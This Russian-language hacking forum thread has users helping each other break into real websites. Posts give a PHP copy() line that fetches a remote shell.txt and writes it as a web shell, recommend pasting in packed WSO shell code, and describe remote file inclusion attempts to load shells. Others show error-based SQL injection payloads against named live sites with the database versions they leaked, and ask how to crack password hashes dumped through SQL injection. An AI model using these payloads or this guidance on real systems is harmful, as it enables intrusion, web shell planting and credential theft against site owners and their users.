ну так заливай, в чем проблема, я тебя понять не могу... если ты о том как заливать, то один из вариантов copy('http://site.ru/shell.txt','/papka/s/npoBaMu/Ha/3anucb/6e3naleBashell.php'); если ты о том что за папка с правами на запись, то найди в пхпхинфо DOCUMENT_ROOT там будет путь к site.ru если у тебя форум в папке site.ru/forum/ то припишешь к этому пути /forum/ ну а там уже сам думай в какую папку лить, ищи которая на запись доступна
Лучше сразу код пакованного WSO вставь. Дальше спокойно посмотришь, где доступно для записи, где нет и зальеш в уютное местечко =)
Я делаю все правильно? Потому что я нашел еще 2 сервера. Другие версии других операционных систем, но ничего не меняется. Но exploit показано, что ходить в их версии. Заранее спасибо.
поле 'search' ничем не отличается от 'уязвимости' id. Это просто мегап****ц вопрос. Никогда в этой теме так никому не говорил, но тут порвало шаблон. НАПИШИ КАКОЕ-НИТЬ подобие сайта из двух страниц и базы, чтобы не задавать таких вопросов.
разве это новая категория уязвимостей? чаще всего там бывает xss или sqli, sqli из за недостаточной фильтрации входящих данных, которые используются вместе с оператором LIKE Melfis +1
подскажите, при RFI подставляю http://ya.ru/ все норм, грузится яшка, далее подставляю http://site.ru/shell.txt - пустая страница в сорце весь код есть, http://site.ru/shell.php - открывает шелл на моем сайте, что еще можно попробывать?? p.s. когда подгружаю с http://files.xakep.biz/shells/PHP/ одни крокозяблы при добавлении ? в конец адреса - пустая страница
вот версию вывел а дальше хз. http://www.9months.ru/vote/25-1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' нужна помощь великих и могучих)) Code: Duplicate column name '5.0.86-log' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/9months/data/www/9months.ru/vote.php on line 195 нет такого опроса
гы, я тоже с этим сайтом в прошлом парился))) вот http://www.dunloptyres.ru/tyre.php?id=3+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+ Code: AND b.id=a.tyre_type_id [nativecode=1062 ** Duplicate entry '5.0.87-community' for key 1] Array
Достаю пассы через скулю с БД, но проблема с кодировкой пассы на кирилице выглядят дdЭеѓj(¤хWnжnѓ» как бороться ?
точнее это не с кодировкой проблемы это так пасы шифруються . Вот пример нескольких паролей У всех по 16 символов , но что это такое ? есть у кого идеи каким макаром оно зашифоровано?
16 символов навело на мысль что это sql хеш , но че он в таком странном виде? Подскажите кто нибудь хоть что-то плз .